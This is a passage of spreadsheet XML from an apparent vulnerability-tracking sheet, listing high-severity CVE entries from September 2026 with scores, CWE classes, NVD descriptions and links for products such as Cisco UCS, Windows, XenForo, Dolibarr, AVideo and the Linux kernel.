      <c r="M546" s="5" t="inlineStr"/>
      <c r="N546" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O546" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P546" s="5" t="inlineStr"/>
      <c r="Q546" s="5" t="inlineStr">
        <is>
          <t>CWE-749</t>
        </is>
      </c>
      <c r="R546" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the Unified Extensible Firmware Interface (UEFI) Shell implementation of Cisco UCS Servers and UCS-based appliances could allow an authenticated attacker with valid credentials for a user account with the role of user or admin&amp;nbsp;or an unauthenticated attacker with physical access to an affected device to bypass UEFI Secure Boot validation checks and execute unauthorized software.
This vulnerability is due to the availability of memory write commands in the UEFI Shell while UEFI Secure Boot is enabled on a device. An attacker could exploit this vulnerability by selecting the UEFI Shell boot option at boot time and using available shell commands to modify UEFI memory variables. A successful exploit could allow the attacker to manipulate the preboot environment, overwrite UEFI Secure Boot-related memory values, and execute unauthorized software on the affected device.</t>
        </is>
      </c>
      <c r="S546" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20293</t>
        </is>
      </c>
    </row>
    <row r="547">
      <c r="A547" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B547" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C547" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54166</t>
        </is>
      </c>
      <c r="D547" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E547" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F547" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G547" s="5" t="inlineStr"/>
      <c r="H547" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I547" s="5" t="inlineStr"/>
      <c r="J547" s="5" t="inlineStr"/>
      <c r="K547" s="5" t="inlineStr"/>
      <c r="L547" s="5" t="inlineStr"/>
      <c r="M547" s="5" t="inlineStr"/>
      <c r="N547" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O547" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P547" s="5" t="inlineStr"/>
      <c r="Q547" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R547" s="5" t="inlineStr">
        <is>
          <t>Shelf is a platform for tracking physical assets. Prior to version 1.20.3, authenticated users with the `asset:import` permission can trigger server-side HTTP requests to attacker-controlled URLs through the Asset CSV Content Import feature. The `imageUrl` validation logic can be bypassed through multiple techniques, including image-extension suffixes, image-related path keywords, domain substring matching, and redirect chains. After validation, the server performs an unrestricted `fetch()` request to the supplied URL. This results in a Server-Side Request Forgery (SSRF) vulnerability that allows attackers to reach internal network services, cloud metadata endpoints, and arbitrary external hosts from the application's network context. Additionally, response bodies are fully buffered before size validation, creating a potential memory exhaustion vector. Version 1.20.3 patches the issue.</t>
        </is>
      </c>
      <c r="S547" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54166</t>
        </is>
      </c>
    </row>
    <row r="548">
      <c r="A548" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B548" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C548" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62089</t>
        </is>
      </c>
      <c r="D548" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E548" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F548" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G548" s="5" t="inlineStr"/>
      <c r="H548" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I548" s="5" t="inlineStr"/>
      <c r="J548" s="5" t="inlineStr"/>
      <c r="K548" s="5" t="inlineStr"/>
      <c r="L548" s="5" t="inlineStr"/>
      <c r="M548" s="5" t="inlineStr"/>
      <c r="N548" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O548" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P548" s="5" t="inlineStr"/>
      <c r="Q548" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R548" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization vulnerability in Pixar Labs Master Addons for Elementor allows Privilege Abuse.
This issue affects Master Addons for Elementor: from n/a through 3.2.2.</t>
        </is>
      </c>
      <c r="S548" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62089</t>
        </is>
      </c>
    </row>
    <row r="549">
      <c r="A549" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B549" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C549" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68846</t>
        </is>
      </c>
      <c r="D549" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E549" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F549" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G549" s="5" t="inlineStr"/>
      <c r="H549" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I549" s="5" t="inlineStr"/>
      <c r="J549" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K54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49" s="5" t="inlineStr"/>
      <c r="M549" s="5" t="inlineStr"/>
      <c r="N549" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O549" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P549" s="5" t="inlineStr"/>
      <c r="Q549" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R549" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S549" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68846</t>
        </is>
      </c>
    </row>
    <row r="550">
      <c r="A550" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B550" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C550" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68889</t>
        </is>
      </c>
      <c r="D550" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E550" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F550" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G550" s="5" t="inlineStr"/>
      <c r="H550" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I550" s="5" t="inlineStr"/>
      <c r="J550" s="5" t="inlineStr"/>
      <c r="K550" s="5" t="inlineStr"/>
      <c r="L550" s="5" t="inlineStr"/>
      <c r="M550" s="5" t="inlineStr"/>
      <c r="N550" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O550" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P550" s="5" t="inlineStr"/>
      <c r="Q550" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R550" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S550" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68889</t>
        </is>
      </c>
    </row>
    <row r="551">
      <c r="A551" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B551" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C551" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69296</t>
        </is>
      </c>
      <c r="D551" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E551" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F551" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G551" s="5" t="inlineStr"/>
      <c r="H551" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I551" s="5" t="inlineStr"/>
      <c r="J551" s="5" t="inlineStr"/>
      <c r="K551" s="5" t="inlineStr"/>
      <c r="L551" s="5" t="inlineStr"/>
      <c r="M551" s="5" t="inlineStr"/>
      <c r="N551" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O551" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P551" s="5" t="inlineStr"/>
      <c r="Q551" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R551" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S551" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69296</t>
        </is>
      </c>
    </row>
    <row r="552">
      <c r="A552" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B552" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C552" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69313</t>
        </is>
      </c>
      <c r="D552" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E552" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F552" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G552" s="5" t="inlineStr"/>
      <c r="H552" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I552" s="5" t="inlineStr"/>
      <c r="J552" s="5" t="inlineStr"/>
      <c r="K552" s="5" t="inlineStr"/>
      <c r="L552" s="5" t="inlineStr"/>
      <c r="M552" s="5" t="inlineStr"/>
      <c r="N552" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O552" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P552" s="5" t="inlineStr"/>
      <c r="Q552" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R552" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S552" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69313</t>
        </is>
      </c>
    </row>
    <row r="553">
      <c r="A553" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B553" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C553" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69396</t>
        </is>
      </c>
      <c r="D553" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E553" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F553" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G553" s="5" t="inlineStr"/>
      <c r="H553" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I553" s="5" t="inlineStr"/>
      <c r="J553" s="5" t="inlineStr"/>
      <c r="K553" s="5" t="inlineStr"/>
      <c r="L553" s="5" t="inlineStr"/>
      <c r="M553" s="5" t="inlineStr"/>
      <c r="N553" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O553" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P553" s="5" t="inlineStr"/>
      <c r="Q553" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R553" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows NDIS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S553" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69396</t>
        </is>
      </c>
    </row>
    <row r="554">
      <c r="A554" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B554" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C554" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73321</t>
        </is>
      </c>
      <c r="D554" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E554" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F554" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G554" s="5" t="inlineStr"/>
      <c r="H554" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I554" s="5" t="inlineStr"/>
      <c r="J554" s="5" t="inlineStr"/>
      <c r="K554" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L554" s="5" t="inlineStr"/>
      <c r="M554" s="5" t="inlineStr"/>
      <c r="N554" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O554" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P554" s="5" t="inlineStr"/>
      <c r="Q554" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="R554" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains an uncontrolled recursion vulnerability in the BBCode parser that allows authenticated attackers to cause persistent denial of service by submitting a post with deeply nested BBCode tags. Attackers can craft a single malicious post with sufficient nesting depth to exceed PHP's stack limit, causing fatal errors that repeatedly terminate PHP-FPM workers for all visitors rendering the affected thread.</t>
        </is>
      </c>
      <c r="S554" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73321</t>
        </is>
      </c>
    </row>
    <row r="555">
      <c r="A555" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B555" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C555" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78134</t>
        </is>
      </c>
      <c r="D555" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E555" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F555" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G555" s="5" t="inlineStr"/>
      <c r="H555" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I555" s="5" t="inlineStr"/>
      <c r="J555" s="5" t="inlineStr"/>
      <c r="K555" s="5" t="inlineStr">
        <is>
          <t>strongswan:strongswan</t>
        </is>
      </c>
      <c r="L555" s="5" t="inlineStr"/>
      <c r="M555" s="5" t="inlineStr"/>
      <c r="N555" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O555" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P555" s="5" t="inlineStr"/>
      <c r="Q555" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R555" s="5" t="inlineStr">
        <is>
          <t>strongSwan 4.5.0 through 6.0.7 has Incorrect Access Control in the eap-ttls and eap-peap plugins because there can be a missing or mismatched inner EAP identity.</t>
        </is>
      </c>
      <c r="S555" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78134</t>
        </is>
      </c>
    </row>
    <row r="556">
      <c r="A556" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B556" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C556" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78807</t>
        </is>
      </c>
      <c r="D556" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E556" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F556" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G556" s="5" t="inlineStr"/>
      <c r="H556" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I556" s="5" t="inlineStr"/>
      <c r="J556" s="5" t="inlineStr"/>
      <c r="K556" s="5" t="inlineStr"/>
      <c r="L556" s="5" t="inlineStr"/>
      <c r="M556" s="5" t="inlineStr"/>
      <c r="N556" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O556" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P556" s="5" t="inlineStr"/>
      <c r="Q556" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="R556" s="5" t="inlineStr">
        <is>
          <t>An issue in wpa_supplicant all versions before v.2.12 allows a local attacker to bypass proper network context and AKMP matching for PMKSA caching via missing validation in the driver based PMKSA selection path in wpa.c</t>
        </is>
      </c>
      <c r="S556" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78807</t>
        </is>
      </c>
    </row>
    <row r="557">
      <c r="A557" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B557" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C557" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80958</t>
        </is>
      </c>
      <c r="D557" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E557" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F557" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G557" s="5" t="inlineStr"/>
      <c r="H557" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I557" s="5" t="inlineStr"/>
      <c r="J557" s="5" t="inlineStr"/>
      <c r="K557" s="5" t="inlineStr"/>
      <c r="L557" s="5" t="inlineStr"/>
      <c r="M557" s="5" t="inlineStr"/>
      <c r="N557" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O557" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P557" s="5" t="inlineStr"/>
      <c r="Q557" s="5" t="inlineStr"/>
      <c r="R557" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm-pcache: clamp the tail kset read to the segment data region
The tail-kset read in cache_replay(), the writeback worker and the GC
worker bounds its length by PCACHE_SEG_SIZE - seg_off, the raw segment
size rather than the data region. A tail near the segment end reads past
the segment data into the following control area.
Clamp the read to cache_seg_remain(), the data region.</t>
        </is>
      </c>
      <c r="S557" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80958</t>
        </is>
      </c>
    </row>
    <row r="558">
      <c r="A558" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B558" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C558" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81007</t>
        </is>
      </c>
      <c r="D558" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E558" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F558" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G558" s="5" t="inlineStr"/>
      <c r="H558" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I558" s="5" t="inlineStr"/>
      <c r="J558" s="5" t="inlineStr"/>
      <c r="K558" s="5" t="inlineStr"/>
      <c r="L558" s="5" t="inlineStr"/>
      <c r="M558" s="5" t="inlineStr"/>
      <c r="N558" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O558" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P558" s="5" t="inlineStr"/>
      <c r="Q558" s="5" t="inlineStr"/>
      <c r="R558" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipmi: ipmb: validate write message length
ipmb_write() read message fields before validating the length byte.
A zero or short write can read uninitialized stack bytes.
A length smaller than the SMBus header underflows the block write length.
Require a non-empty buffer and the minimum IPMB request length.
Also require the length byte plus payload before parsing the message.</t>
        </is>
      </c>
      <c r="S558" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81007</t>
        </is>
      </c>
    </row>
    <row r="559">
      <c r="A559" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B559" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C559" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81011</t>
        </is>
      </c>
      <c r="D559" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E559" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F559" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G559" s="5" t="inlineStr"/>
      <c r="H559" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I559" s="5" t="inlineStr"/>
      <c r="J559" s="5" t="inlineStr"/>
      <c r="K559" s="5" t="inlineStr"/>
      <c r="L559" s="5" t="inlineStr"/>
      <c r="M559" s="5" t="inlineStr"/>
      <c r="N559" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O559" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P559" s="5" t="inlineStr"/>
      <c r="Q559" s="5" t="inlineStr"/>
      <c r="R559" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: hp-bioscfg: pass validated element count to package parsers
The per-type package parsers are handed the wrong element count.
hp_init_bios_package_attribute() validates obj-&gt;package.count and then
calls one of the five hp_populate_*_package_data() wrappers (string,
integer, enumeration, ordered list, password). Each wrapper forwards a
count to its hp_populate_*_elements_from_package() parser, but instead
of forwarding the validated obj-&gt;package.count it derives the count
from elements[0]. elements[0] is the NAME field and is always an
ACPI_TYPE_STRING, so reading -&gt;package.count from it in fact reads
-&gt;string.length through the union acpi_object. The parsers thus bound
themselves against the length of the name string rather than against
the real number of elements in the package.
This is safe today because hp_init_bios_package_attribute() refuses any
package that has fewer than the type's element count, so a parser only
ever runs on a full package and never reads past it regardless of the
bogus bound.
An upcoming change relaxes that check to accept shorter packages. Once
a parser can receive fewer elements than its per-type count, a bound
taken from the name length no longer reflects the array size, and the
"elem &lt; count" loop conditions and "elem + n &gt;= count" sub-loop guards
read past the end of elements[] - an out-of-bounds heap read.
Forward the validated obj-&gt;package.count to every *_package_data()
wrapper so the parsers bound themselves against the real package size.
This does not change behaviour for the packages that enumerate
correctly today and is a prerequisite for accepting shorter packages
safely.</t>
        </is>
      </c>
      <c r="S559" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81011</t>
        </is>
      </c>
    </row>
    <row r="560">
      <c r="A560" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B560" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C560" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89012</t>
        </is>
      </c>
      <c r="D560" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E560" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F560" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G560" s="5" t="inlineStr"/>
      <c r="H560" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I560" s="5" t="inlineStr"/>
      <c r="J560" s="5" t="inlineStr"/>
      <c r="K560" s="5" t="inlineStr"/>
      <c r="L560" s="5" t="inlineStr"/>
      <c r="M560" s="5" t="inlineStr"/>
      <c r="N560" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O560" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P560" s="5" t="inlineStr"/>
      <c r="Q560" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="R560" s="5" t="inlineStr">
        <is>
          <t>Dolibarr 24.0.0 before 24.0.1 contains a case-sensitive denylist bypass vulnerability in the sqlfilters API query parameter that allows authenticated attackers to recover protected database fields by supplying uppercase variants of denylist-protected field names. Attackers can exploit the case-insensitive database column resolution against the case-sensitive denylist check in the core library to use prefix-matching predicates as a boolean oracle and extract full password hashes for any user account, including administrators.</t>
        </is>
      </c>
      <c r="S560" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89012</t>
        </is>
      </c>
    </row>
    <row r="561">
      <c r="A561" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B561" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C561" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89245</t>
        </is>
      </c>
      <c r="D561" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E561" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F561" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G561" s="5" t="inlineStr"/>
      <c r="H561" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I561" s="5" t="inlineStr"/>
      <c r="J561" s="5" t="inlineStr"/>
      <c r="K561" s="5" t="inlineStr"/>
      <c r="L561" s="5" t="inlineStr"/>
      <c r="M561" s="5" t="inlineStr"/>
      <c r="N561" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O561" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P561" s="5" t="inlineStr"/>
      <c r="Q561" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R561" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a cross-site request forgery vulnerability in playlistRemove.php that allows attackers to delete playlists by skipping CSRF protection checks. Attackers can craft a malicious form that submits a POST request to playlistRemove.php, causing a victim's playlist to be deleted when they visit the attacker's page while logged in.</t>
        </is>
      </c>
      <c r="S561" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89245</t>
        </is>
      </c>
    </row>
    <row r="562">
      <c r="A562" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B562" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C562" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89251</t>
        </is>
      </c>
      <c r="D562" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E562" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F562" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G562" s="5" t="inlineStr"/>
      <c r="H562" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I562" s="5" t="inlineStr"/>
      <c r="J562" s="5" t="inlineStr"/>
      <c r="K562" s="5" t="inlineStr"/>
      <c r="L562" s="5" t="inlineStr"/>
      <c r="M562" s="5" t="inlineStr"/>
      <c r="N562" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O562" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P562" s="5" t="inlineStr"/>
      <c r="Q562" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R562" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 fails to validate ad impressions in plugin/AD_Server/log.php, allowing logged-in users to submit arbitrary label values that trigger unverified wallet credits to campaign video owners. Attackers can repeatedly POST label=start requests to mint YPTWallet balance for any campaign video without proof an ad actually played.</t>
        </is>
      </c>
      <c r="S562" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89251</t>
        </is>
      </c>
    </row>
    <row r="563">
      <c r="A563" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
